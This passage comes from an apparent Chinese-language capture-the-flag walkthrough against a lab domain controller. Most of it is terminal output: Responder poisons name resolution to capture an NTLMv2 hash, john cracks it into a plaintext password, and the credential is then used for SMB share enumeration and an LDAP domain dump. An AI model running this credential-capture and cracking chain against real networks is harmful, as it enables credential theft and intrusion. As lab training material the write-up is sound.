\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ responder -I eth0 -v \n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR & MDNS Responder 3.1.6.0\n\n  To support this project:\n  Github -> https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -> https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n[!] Responder must be run as root.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ sudo responder -I eth0 -v \n                                         __\n  .----.-----.-----.-----.-----.-----.--|  |.-----.----.\n  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|\n  |__| |_____|_____|   __|_____|__|__|_____||_____|__|\n                   |__|\n\n           NBT-NS, LLMNR & MDNS Responder 3.1.6.0\n\n  To support this project:\n  Github -> https:\/\/github.com\/sponsors\/lgandx\n  Paypal  -> https:\/\/paypal.me\/PythonResponder\n\n  Author: Laurent Gaffie (laurent.gaffie@gmail.com)\n  To kill this script hit CTRL-C\n\n[+] Poisoners:\n    LLMNR                      [ON]\n    NBT-NS                     [ON]\n    MDNS                       [ON]\n    DNS                        [ON]\n    DHCP                       [OFF]\n\n[+] Servers:\n    HTTP server                [ON]\n    HTTPS server               [ON]\n    WPAD proxy                 [OFF]\n    Auth proxy                 [OFF]\n    SMB server                 [ON]\n    Kerberos server            [ON]\n    SQL server                 [ON]\n    FTP server                 [ON]\n    IMAP server                [ON]\n    POP3 server                [ON]\n    SMTP server                [ON]\n    DNS server                 [ON]\n    LDAP server                [ON]\n    MQTT server                [ON]\n    RDP server                 [ON]\n    DCE-RPC server             [ON]\n    WinRM server               [ON]\n    SNMP server                [ON]\n\n[+] HTTP Options:\n    Always serving EXE         [OFF]\n    Serving EXE                [OFF]\n    Serving HTML               [OFF]\n    Upstream Proxy             [OFF]\n\n[+] Poisoning Options:\n    Analyze Mode               [OFF]\n    Force WPAD auth            [OFF]\n    Force Basic Auth           [OFF]\n    Force LM downgrade         [OFF]\n    Force ESS downgrade        [OFF]\n\n[+] Generic Options:\n    Responder NIC              [eth0]\n    Responder IP               [192.168.10.106]\n    Responder IPv6             [fd00:4c10:d50a:f900:d8a5:2ca6:8023:decc]\n    Challenge set              [random]\n    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']\n    Don't Respond To MDNS TLD  ['_DOSVC']\n    TTL for poisoned response  [default]\n\n[+] Current Session Variables:\n    Responder Machine Name     [WIN-ZSMONS9XBC0]\n    Responder Domain Name      [VGNJ.LOCAL]\n    Responder DCE-RPC Port     [47249]\n\n[+] Listening for events...\n\n[*] [NBT-NS] Poisoned answer sent to 192.168.10.107 for name FILESERVER (service: File Server)\n[*] [MDNS] Poisoned answer sent to 192.168.10.107  for name FileServer.local\n[*] [MDNS] Poisoned answer sent to 192.168.10.107  for name FileServer.local\n[*] [MDNS] Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer.local\n[*] [LLMNR]  Poisoned answer sent to 192.168.10.107 for name FileServer\n[*] [LLMNR]  Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer\n[*] [LLMNR]  Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer\n[*] [MDNS] Poisoned answer sent to fe80::d908:b340:cd67:75e0 for name FileServer.local\n[*] [LLMNR]  Poisoned answer sent to 192.168.10.107 for name FileServer\n[SMB] NTLMv2-SSP Client   : 192.168.10.107\n[SMB] NTLMv2-SSP Username : soupedecode\\xkate578\n[SMB] NTLMv2-SSP Hash     : xkate578::soupedecode:661833a474caef4b:2705FBC03C88C51E1DA862424B2106CD:010100000000000080FD9121DEDBDB01C95601CBAE89D1610000000002000800560047004E004A0001001E00570049004E002D005A0053004D004F004E0053003900580042004300300004003400570049004E002D005A0053004D004F004E005300390058004200430030002E00560047004E004A002E004C004F00430041004C0003001400560047004E004A002E004C004F00430041004C0005001400560047004E004A002E004C004F00430041004C000700080080FD9121DEDBDB01060004000200000008003000300000000000000000000000004000009A05ABEE76DFA3B2575A55983467789E597B55EE268E77B48DB077AFDA8FDC0C0A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000\n[+] Exiting...<\/code><\/pre>\n
\u8fd9\u4e2a\u9a8c\u8bc1\u8fc7\u7a0b\u5c31\u80fd\u53d1\u73b0\u5b58\u5728\u8be5\u6f0f\u6d1e\u3002\u3002\u3002\u5f97\u5230\u65b0\u51ed\u8bc1\uff0c\u5c1d\u8bd5\u7834\u89e3\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ echo "xkate578::soupedecode:661833a474caef4b:2705FBC03C88C51E1DA862424B2106CD:010100000000000080FD9121DEDBDB01C95601CBAE89D1610000000002000800560047004E004A0001001E00570049004E002D005A0053004D004F004E0053003900580042004300300004003400570049004E002D005A0053004D004F004E005300390058004200430030002E00560047004E004A002E004C004F00430041004C0003001400560047004E004A002E004C004F00430041004C0005001400560047004E004A002E004C004F00430041004C000700080080FD9121DEDBDB01060004000200000008003000300000000000000000000000004000009A05ABEE76DFA3B2575A55983467789E597B55EE268E77B48DB077AFDA8FDC0C0A0010000000000000000000000000000000000009001E0063006900660073002F00460069006C0065005300650072007600650072000000000000000000" > hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ john -w=\/usr\/share\/wordlists\/rockyou.txt hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (netntlmv2, NTLMv2 C\/R [MD4 HMAC-MD5 32\/64])\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\njesuschrist      (xkate578)     \n1g 0:00:00:00 DONE (2025-06-12 21:10) 3.846g\/s 3938p\/s 3938c\/s 3938C\/s 123456..bethany\nUse the "--show --format=netntlmv2" options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n
\u5f97\u5230\u51ed\u8bc1xkate578:jesuschrist<\/code>\uff0c\u5f00\u59cb\u8fdb\u4e00\u6b65\u4fe1\u606f\u641c\u96c6\uff01\uff01\uff01\uff01<\/p>\n
\u4e8c\u6b21\u4fe1\u606f\u641c\u96c6<\/h3>\n
smb\u670d\u52a1\u63a2\u6d4b<\/h4>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbmap -H $IP -u xkate578 -p jesuschrist\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/"       )|"  \\    \/"  ||   _  "\\ |"  \\    \/"  |     \/""\\       |   __ "\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/' \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __'  \\    (|  \/\n   \/" \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n-----------------------------------------------------------------------------\nSMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB                                                                                                  \n[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          \n\n[+] IP: 192.168.10.107:445      Name: 192.168.10.107            Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                READ ONLY       Logon server share \n        share                                                   READ, WRITE\n        SYSVOL                                                  READ ONLY       Logon server share \n[*] Closed 1 connections<\/code><\/pre>\n
\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u53ef\u5199\u5171\u4eab\u76ee\u5f55\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n
smb: \\YPILSAodqR\\> ls\n^C\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\xkate578" \/\/$IP\/share \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n  .                                  DR        0  Fri Jun 13 12:07:57 2025\n  ..                                  D        0  Thu Aug  1 01:38:08 2024\n  desktop.ini                       AHS      282  Thu Aug  1 01:38:08 2024\n  user.txt                            A       70  Thu Aug  1 01:39:25 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\> get user.txt\ngetting file \\user.txt of size 70 as user.txt (0.5 KiloBytes\/sec) (average 0.5 KiloBytes\/sec)\nsmb: \\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\xkate578" \/\/$IP\/IPC$ \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\xkate578" \/\/192.168.10.107\/NETLOGON\nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n  .                                   D        0  Thu Aug  1 02:07:52 2024\n  ..                                  D        0  Sat Jun 15 15:30:47 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\> exit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ smbclient -U "SOUPEDECODE.LOCAL\\xkate578" \/\/192.168.10.107\/SYSVOL  \nPassword for [SOUPEDECODE.LOCAL\\xkate578]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n  .                                   D        0  Thu Aug  1 02:07:52 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  SOUPEDECODE.LOCAL                  Dr        0  Sat Jun 15 15:21:21 2024\n  YPILSAodqR                          D        0  Thu Aug  1 02:07:52 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\> cd SOUPEDECODE.LOCAL\nsmb: \\SOUPEDECODE.LOCAL\\> ls\n  .                                   D        0  Sat Jun 15 15:30:47 2024\n  ..                                  D        0  Sat Jun 15 15:21:21 2024\n  DfsrPrivate                      DHSr        0  Sat Jun 15 15:30:47 2024\n  Policies                            D        0  Sat Jun 15 15:21:30 2024\n  scripts                             D        0  Thu Aug  1 02:07:52 2024\n\n                12942591 blocks of size 4096. 10718255 blocks available\nsmb: \\SOUPEDECODE.LOCAL\\> cd ..\/YPILSAodqR\nsmb: \\YPILSAodqR\\> ls\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ cat user.txt \n\ufffd\ufffd12f54a96f64443246930da001cafda8b<\/code><\/pre>\n
\u9664\u4e86flag\uff0c\u6ca1\u53d1\u73b0\u5565\u3002\u3002\u3002\u5c1d\u8bd5\u7528\u8fd9\u4e2a\u51ed\u8bc1\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u62a5\u9519\u4e86\uff1a<\/p>\n
\"image-20250613091920513\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u6536\u96c6AD\u57df\u4fe1\u606f<\/h3>\n
\u4f7f\u7528ldapdomaindump <\/code>\u5de5\u5177\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03]\n\u2514\u2500$ mkdir domain\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ ldapdomaindump $IP -u 'SOUPEDECODE.LOCAL\\xkate578' -p jesuschrist\n[*] Connecting to host...\n[*] Binding to host\n[+] Bind OK\n[*] Starting domain dump\n[+] Domain dump finished\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/DC03\/domain]\n\u2514\u2500$ grep -Pnir xkate578                               \ndomain_users.json:54297:            "xkate578@soupedecode.local"\ndomain_users.json:54330:            "xkate578"\ndomain_users.json:54360:            "xkate578@soupedecode.local"\ndomain_users_by_group.html:449:<tr><td>Xenia Kate<\/td><td>Xenia Kate<\/td><td>xkate578<\/td><td>06\/15\/24 20:04:39<\/td><td>06\/13\/25 16:04:01<\/td><td>06\/13\/25 16:04:01<\/td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD<\/td><td>08\/01\/24 05:37:18<\/td><td><abbr title="S-1-5-21-2986980474-46765180-2505414164-1182">1182<\/abbr><\/td><td>Adventure seeker and extreme sports fan<\/td><\/tr>\ndomain_users_by_group.html:999:<tr><td>Xenia Kate<\/td><td>Xenia Kate<\/td><td>xkate578<\/td><td>06\/15\/24 20:04:39<\/td><td>06\/13\/25 16:04:01<\/td><td>06\/13\/25 16:04:01<\/td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD<\/td><td>08\/01\/24 05:37:18<\/td><td><abbr title="S-1-5-21-2986980474-46765180-2505414164-1182">1182<\/abbr><\/td><td>Adventure seeker and extreme sports fan<\/td><\/tr>\ndomain_users.html:449:<tr><td>Xenia Kate<\/td><td>Xenia Kate<\/td><td>xkate578<\/td><td><a href="domain_users_by_group.html#cn_Account_Operators" title="CN=Account Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL">Account Operators<\/a><\/td><td><a href="domain_users_by_group.html#cn_Domain_Users" title="CN=Domain Users,CN=Users,DC=SOUPEDECODE,DC=LOCAL">Domain Users<\/a><\/td><td>06\/15\/24 20:04:39<\/td><td>06\/13\/25 16:04:01<\/td><td>06\/13\/25 16:04:01<\/td><td>NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD<\/td><td>08\/01\/24 05:37:18<\/td><td><abbr title="S-1-5-21-2986980474-46765180-2505414164-1182">1182<\/abbr><\/td><td>Adventure seeker and extreme sports fan<\/td><\/tr>\ndomain_users.grep:419:Xenia Kate        Xenia Kate      xkate578        Account Operators       Domain Users    06\/15\/24 20:04:39       06\/13\/25 16:04:01       06\/13\/25 16:04:01       NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD   08\/01\/24 05:37:18       S-1-5-21-2986980474-46765180-2505414164-1182    Adventure seeker and extreme sports fan<\/code><\/pre>\n